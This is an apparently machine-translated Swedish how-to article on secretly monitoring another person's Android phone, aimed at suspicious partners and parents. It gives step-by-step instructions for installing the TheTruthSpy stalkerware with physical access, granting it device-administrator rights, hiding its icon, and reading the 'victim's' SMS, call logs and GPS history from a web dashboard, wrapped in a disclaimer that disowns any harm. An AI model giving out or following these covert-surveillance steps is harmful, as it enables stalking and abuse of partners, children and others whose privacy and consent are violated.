hur man enkelt trycker på andras Android-telefoner

Vill du veta hur du trycker på någon annans Android-telefon? Så här trycker du på någon annans Android-telefon! Vänligen läs det!

Är du misstänksam mot de aktiviteter som dina vänner eller flickvänner gör på Android? Eller är du en förälder som vill känna till deras barns dagliga liv?

Koppla av, vi har ett sätt så att du kan spela in alla aktiviteter i någons mobiltelefon i hemlighet och utan att de är medvetna om det.

Den här metoden är ganska lätt att göra, men du måste ha fysisk tillgång till smarttelefonen för den person du vill trycka på. Så här trycker du i hemlighet på andras Android-telefoner.

Var försiktig, vi måste påminna dig om att du inte använder dessa tips för aktiviteter som är skadliga för vissa individer eller fester. Allt som hamnar skadligt för ett parti är inte vårt ansvar.

 • UPPDATERING 2016: Samling av hacktricks för Android utan root
 • 10 Android-hemliga koder du måste veta
 • Dessa är de 10 farligaste hackarna i världen (Psst ... Det finns indonesiska hackare, du vet)

Steg för att trycka på andras Android-telefoner

 • Först behöver du en ansökan som heter TheTruthSpy. Ladda ner och installera applikationen via länk det följande.
Produktivitetsappar Sanningen Spy NEDLADDNING
 • I så fall öppnar du applikationen och skapar ett nytt konto via knappen Registrera nytt konto. Ange din e-postadress och lösenord och tryck sedan på Skapa konto.

 • Sida Enhetsadministratör kommer öppna. Tryck Aktivera för att aktivera den.

 • Nu är applikationen redo att användas. All data från smarttelefonen som du installerar applikationen laddas upp till TheTruthSpy-webbplatsen. Om du vill ta bort applikationsikonen TheTruthSpy från offrets mobiltelefon behöver du bara trycka på en knapp Konfigurationoch välj Dölj ikon TheTruthSpy.

 • Om du vill se vilka data applikationen har fått kan du helt enkelt öppna webben my.thetruthspy.com, ange e-postadressen och lösenordet som du tidigare registrerade.

 • För standardversionen kan du bara extrahera data om offrets plats genom funktionen GPS-historik, lista SMS, Telefon historikoch Automatiskt svar. Mer kompletta funktioner kan erhållas via Premium- och Gold-paketen till olika kostnader beroende på paketet.

 • I SMS-historik, kan du se alla SMS i inkorgen på offrets mobiltelefon

 • Du kan också få samma sak genom kolumner Telefon historik. Inuti finns det en helhet lista inkommande och utgående samtal från offret.

Således artikeln om hur man enkelt kan trycka på andras Android-telefoner, betonar vi återigen och påminner er om att inte använda den här metoden för aktiviteter som skadar vissa individer eller partier. Saker som hamnar skadligt för dessa parter är inte vårt ansvar.


$config[zx-auto] not found$config[zx-overlay] not found